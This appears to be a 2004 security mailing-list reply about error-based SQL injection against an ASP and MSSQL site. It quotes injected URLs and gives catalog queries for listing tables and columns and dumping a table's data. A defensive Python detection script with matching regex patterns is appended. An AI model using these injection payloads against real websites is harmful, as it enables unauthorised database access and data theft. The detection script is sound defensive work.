WebApp Sec mailing list archives
Re: SQL Injection data retrieving??
From: Jonathan Angliss <jon () netdork net>
Date: Fri, 10 Sep 2004 14:31:11 -0500
Hi Roland,

Friday, September 10, 2004, 7:06:56 AM, you wrote:
First I've sent this URL:
www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' order by asc))
And I've got the following error:
Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__big_field' to a column of data type int. /products.asp, line 32
You got that error because name is described as type sysname, which according to that error is a type of nvarchar. Unless it's obviously a numeric in a string, using convert will fail, for example:

    convert(int, '123')    That'll work
    convert(int , 'abc')   That'll fail.

Unless getting it to generate such an error is part of your plan.
I assume that "__big_field" is the name of the database? Right?
I believe that's a table name, not a database name. I believe the database names are stored under the master database in a table called sysdatabases.
Secondly I've sent the following URL in order to get the table name:
www.mysite.com/products.asp?id=convert(int,(select top 1 name from sysobjects where xtype='u' and name>'__big_field' order by 1 asc))
Error Type: Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error converting the nvarchar value '__dellist' to a column of data type int. /products.asp, line 32
Again, you're attempting to convert an nvarchar to an integer.
So "__dellist" is a table from the "__big_field" database? Right?
No, just another table in the same database; your where clause is telling the query to ignore the table __big_field, so it just grabs the next one down.
Now here come the troubles... I would like to retrieve the column names of the "__dellist" table and the data of the "__dellist".
    select id from sysobjects where name = '__dellist'

That'll get you the table id. Then:

    select name from syscolumns where id = [id from above query]

That'll get you the column names. Or you can use a single query:

    select c.name from syscolumns as c inner join sysobjects as o on o.id = c.id where o.name = '__dellist'
I've sent:
www.mysite.com/products.asp?id=convert(int,(select * from __dellist where 1=1))
Error Type: Microsoft OLE DB Provider for SQL Server (0x80004005) Subquery returned more than 1 value. This is not permitted when the subquery follows =, !=, <, <= , >, >= or when the subquery is used as an expression. /products.asp, line 32
You're issuing a convert on a number of fields; I don't think SQL likes that very much.
My question is: Which query should I send in order to retrieve the data of the table??
    select * from __dellist

The problem is, if the script isn't designed to handle the output from __dellist, it might not be of any use doing half of this as you cannot see the output, though the page might generate a bunch of errors.

--
Jonathan Angliss
(jon () netdork net)

I before E except after C, huh? Weird.....
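The pattern discussed in this message leaves two traces a defender can look for: requests whose parameter wraps a subquery in convert(int, ...) or names the system catalog tables, and responses in which the OLE DB conversion error echoes a value back to the client. The following triage sketch is an added example, not part of the original message; the event tuple layout, the function names and the sample data (including the table names) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Request-side markers taken from the queries quoted in this thread.
CONVERT_SUBQUERY = re.compile(r"convert\s*\(\s*int\s*,\s*\(\s*select\b", re.I)
CATALOG = re.compile(r"\b(sysobjects|syscolumns|sysdatabases)\b", re.I)
# Response-side marker: the verbose provider error that echoes a value.
LEAK = re.compile(r"Syntax error converting the nvarchar value '([^']*)' "
                  r"to a column of data type int")

def score_request(query_string):
    """Return the reasons a query string looks like error-based probing."""
    q = unquote_plus(query_string)  # decode %xx and '+' before matching
    reasons = []
    if CONVERT_SUBQUERY.search(q):
        reasons.append("convert-int-subquery")
    if CATALOG.search(q):
        reasons.append("system-catalog-reference")
    return reasons

def leaked_values(response_body):
    """Values that a detailed conversion error exposed to the client."""
    return LEAK.findall(response_body)

def triage(events):
    """events: iterable of (client, query_string, response_body) tuples."""
    findings = {}
    for client, query_string, body in events:
        reasons, leaks = score_request(query_string), leaked_values(body)
        if not reasons and not leaks:
            continue
        entry = findings.setdefault(
            client, {"requests": 0, "reasons": set(), "leaked": []})
        entry["requests"] += 1
        entry["reasons"].update(reasons)
        entry["leaked"].extend(leaks)
    return findings

ERR = ("Microsoft OLE DB Provider for SQL Server (0x80040E07) Syntax error "
       "converting the nvarchar value '%s' to a column of data type int.")
# Constructed sample events (documentation IP ranges, made-up table names).
SAMPLE = [
    ("198.51.100.7", "id=42", "<html>Product 42</html>"),
    ("192.0.2.10", "id=convert(int,(select+top+1+name+from+sysobjects"
                   "+where+xtype%3D'u'))", ERR % "example_table"),
    ("192.0.2.10", "id=convert(int,(select+top+1+name+from+sysobjects+where"
                   "+name>'example_table'))", ERR % "example_other"),
]

if __name__ == "__main__":
    print(triage(SAMPLE))
```

A non-empty `leaked` list means detailed provider errors are reaching clients; returning a generic error page and binding `id` as a typed parameter removes both the leak and the injection point.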